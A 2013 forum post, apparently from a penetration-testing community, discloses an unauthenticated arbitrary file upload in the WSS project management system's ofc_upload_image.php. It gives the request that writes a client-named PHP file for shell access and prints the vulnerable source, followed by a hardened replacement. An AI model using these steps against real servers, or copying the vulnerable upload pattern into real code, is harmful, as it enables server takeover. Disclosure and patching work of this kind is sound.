中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: WSS Project Management System POST get shell

Author: admin    Time: 2013-2-23 12:38
Title: WSS Project Management System POST get shell
POSTing data to the vulnerable file saves a file with an arbitrary extension.
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php  (hfy.php is the file name)

POST arbitrary data.
Saved location: http://localhost/chart/tmp-upload-images/hfy.php

The latest version of WSS has this vulnerable file; even the paid version has it. Demo deployed on the Sina app store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// NOTE: the file name (including its extension) is taken straight from the
// client; only basename() is applied, with no authentication or extension check.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

// NOTE: the raw request body is written verbatim, so whatever was POSTed
// ends up on disk under the client-chosen name.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is a tragedy. How to fix it? Add permission checks, extension validation and so on~ do it yourself.
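A hardened rewrite of the save_image branch shown above, added here as an example (it is not WSS or Open Flash Chart code). It assumes the host application starts a session and sets $_SESSION['user_id'] on login, and that the web server is separately configured not to execute scripts under tmp-upload-images/.

```php
<?php
// Hardened replacement for the save_image branch of ofc_upload_image.php.
// Added example, not vendor code. Assumption: the application sets
// $_SESSION['user_id'] when a user logs in.
session_start();

// 1. Permission check: only logged-in users may save chart images.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('login required');
}

// 2. Never derive the stored file name from $_GET['name']. Generate a
//    random name with a fixed .png extension; the client-supplied value
//    is at most a display label and is never used in a path.
$default_path = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($default_path)) {
    mkdir($default_path, 0750, true);
}
$stored_name = bin2hex(random_bytes(16)) . '.png';
$destination = $default_path . $stored_name;

// 3. Read the raw body via php://input ($HTTP_RAW_POST_DATA was removed in
//    PHP 7) and verify it really is a PNG by its 8-byte signature, with a
//    size cap so the endpoint cannot be used to fill the disk.
$raw = file_get_contents('php://input');
$png_sig = "\x89PNG\r\n\x1a\n";
if ($raw === false
        || strlen($raw) > 2 * 1024 * 1024
        || substr($raw, 0, 8) !== $png_sig) {
    http_response_code(400);
    exit('not a PNG image');
}

// 4. Write without execute bits; the directory itself should also be
//    served without script execution by the web server.
if (file_put_contents($destination, $raw, LOCK_EX) === false) {
    http_response_code(500);
    exit("can't open file");
}
chmod($destination, 0640);

echo 'Saving your image to: ' . htmlspecialchars($stored_name, ENT_QUOTES, 'UTF-8');
exit();
```

With this in place a request such as ?name=hfy.php carrying arbitrary data is rejected before anything touches the disk, and even a valid PNG lands under a server-chosen name ending in .png.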
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2